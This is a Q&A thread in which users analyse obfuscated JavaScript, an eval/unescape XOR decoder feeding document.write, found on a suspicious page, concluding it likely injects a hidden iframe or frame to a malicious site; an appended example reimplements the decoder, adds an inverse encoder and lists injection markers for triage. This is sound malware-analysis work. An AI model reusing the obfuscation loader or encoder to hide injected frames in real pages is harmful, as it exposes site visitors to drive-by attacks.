
I have encountered some JavaScript code which I believe is malicious, but most of it is obfuscated. I was wondering if someone could help me figure out what this code actually does.

eval(unescape('function n48ec61ae(s) {
    var r = "";
    var tmp = s.split("12113781");
    s = unescape(tmp[0]);
    k = unescape(tmp[1] + "608421");
    for( var i = 0; i < s.length; i++) {
        r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-4);
    }
    return r;
}
'));
eval(unescape('document.write(n48ec61ae('') + 'GoqwpF@dmgiEFxipviJBkSbzbjxy,_WMD1yj{yoBFqa|g%ufxoA"go}swtip%-asvporpE$'EF3hachJAmulwisa~$^WYVF%<24-8(&,BQWOJ_G&0."J^ASHAP_NIRI 4. HWBR@QTAOKRCE$5!A@n~cqa PDVJH xw| $_RE@!oq~t:;5{s0ram`axsau2ows2ulaoizm6<21wnkdpicp5hx6vms@q042enA1?7+5=0oI $ZWTHPNWOBFj~ash#QLWIE.nsyaos5kl~& _PGI"ggtzq8ftmto. SDQHDT[I@^LI"6'#RLPKIZJIEONYF%= $SOPSXTOSLB/TS",LVMUKGTUAOVE.2&,VQWNTDXIF@;ntdvj~oxFHtsbrgpntKF3v{lvmukvEF3hpwpJ121137817396048' + unescape(''));'));
// -->

Just as a reminder DO NOT EXECUTE THIS CODE.

njvb
  • Unless there's a bug in the JavaScript parsing functions, `n48..()` seems safe to run. There are however bugs in the second line which make it impossible to run (without eval of course). Seems to want to insert an iframe to a bad site, but I could only extract part of the url by removing the `'`s in `Goq...` and passing that as an arg through `n48...(s)`. – ninjagecko Jun 29 '11 at 02:59
  • Well, I'm not entirely sure. Since I have NoScript, it gives me this in HTML comments and a blank page with this line at the bottom. I have a friend who went there by accident and wanted me to check it, but I still don't trust it. – njvb Jun 29 '11 at 03:26
  • It doesn't seem to do a great deal in Chrome ... unless I did something wrong. It seemed to write a bunch of garbage to my screen. That was it. – James Khoury Jun 29 '11 at 06:04
  • ninjagecko is right - it tries to print something like: D^ikiCC{fuleJFiOfz\g{v!USEH3u^{wjAAtcx_)oblg?\hpqsl]r!!amsshwrAI\a]eI>`oho]q]rXRZQK828'4*?RPBH[?*2*&JX7jl{pD" – eapen Jun 29 '11 at 06:38
  • Well, yeah, document.write is pretty straightforward, but what it is trying to print may contain a malicious script tag, and I'm not sure if this is just gibberish or actually executable obfuscated code. – njvb Jun 29 '11 at 15:20

1 Answer


Silly rabbit... tricks are for virtual machine images which you were planning on discarding anyway...

I've spent a good deal of time on this and I think I can confirm that this is so obfuscated that it can't do anything anymore.

You'll get this:

<html>D`i]eI>vdsq\H>kW^v`fly*ZLJI3ujouk@BuazbrkzkA&ckwo{lgm*dqrpcnl? +=@.k^fjFAaqhmewax!UPLLB0.0'4*?RPBH[?*,* FRAMEBORDER=0$<O<OCNYCKKV?A1%A>ku\tcPHRFJlozXW?<!cmzn6/-un3mdg\alo]o.com/nkdeeza280-{feasffr1hl2rgoDq.11bcC-7;'17,cI!YPYJLF[K><frame NAME="jo{]cs3fgy+"[PKE]cxzo5]s`nk&$O@SDHLUDCYAK.+NFL?ITGJBBDU>)9OCPMUOHVF>'XO&HZESF<SXCKNI*.(ZQQKOCMKB@/jp^r^viu=Gyq^rkljnGJ3pvgq`ognIB/jl{pD

The problem is that another function is needed to unscramble this. Notice how it has <html> as well as FRAMEBORDER=, and <frame? That means that there is something which is able to break this up into chunks and reassemble it. The fact that there is so much noise also suggests that there is a function which further decrypts this beyond the scope of n48ec61ae.

cwallenpoole
  • Thanks, I suppose I would get it if I disabled NoScript, but I don't trust it to do that. – njvb Jul 01 '11 at 20:54
  • Oh no problem. I actually happened to have a virtual machine I was about to delete anyway, so I took a few minutes, booted, and tried it. – cwallenpoole Jul 01 '11 at 21:55
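The decoder in the question can be analysed without eval or document.write at all. The block below is an added example, not code from the post or its commenters: it reimplements the n48ec61ae transform (split on "12113781", unescape, key plus "608421", per-character XOR with a key digit then minus 4), adds an inverse that exists only to build a constructed test payload (the post's own payload cannot be fed in verbatim because its quoting is broken, as ninjagecko noted), and flags injection markers in the decoded text; the key digits "7396048" are from the post, the plaintext and example.invalid host are made up.

```javascript
// Added example, not from the original post: a safe reimplementation of the
// n48ec61ae decoder plus a constructed inverse for testing it.

// Mirrors the posted routine: split on the literal "12113781", unescape both
// halves, append "608421" to the key, then per character (keyDigit XOR code) - 4.
function decodeN48ec61ae(s) {
  const parts = s.split("12113781");
  const data = unescape(parts[0]);
  const key = unescape(parts[1] + "608421");
  let out = "";
  for (let i = 0; i < data.length; i++) {
    const k = parseInt(key.charAt(i % key.length), 10); // NaN acts as 0 under XOR
    out += String.fromCharCode((k ^ data.charCodeAt(i)) - 4);
  }
  return out;
}

// Inverse of the decoder (constructed here; the page never shows an encoder).
// Used to confirm the reimplementation before pointing it at a real sample.
function encodeForN48ec61ae(plain, keyDigits) {
  const key = keyDigits + "608421";
  let scrambled = "";
  for (let i = 0; i < plain.length; i++) {
    const k = parseInt(key.charAt(i % key.length), 10);
    scrambled += String.fromCharCode((plain.charCodeAt(i) + 4) ^ k);
  }
  return escape(scrambled) + "12113781" + keyDigits;
}

// Triage helper: which HTML/JS injection markers appear in decoded output.
// A hit means this stage would have written active content via document.write;
// no hit on a long blob (as in the thread) points at another decoding layer.
const MARKERS = ["<iframe", "<frame", "<script", "frameborder", "document.write"];
function suspiciousMarkers(decoded) {
  const lower = decoded.toLowerCase();
  return MARKERS.filter((m) => lower.includes(m));
}

// Constructed demonstration; example.invalid is a placeholder host, and the
// key digits "7396048" are the ones that trail the post's payload.
const SAMPLE = '<iframe src="http://example.invalid/x" frameborder=0></iframe>';
const SAMPLE_PAYLOAD = encodeForN48ec61ae(SAMPLE, "7396048");
```

Run the decoder on a captured payload string in Node rather than in a browser, and inspect the returned string instead of writing it anywhere.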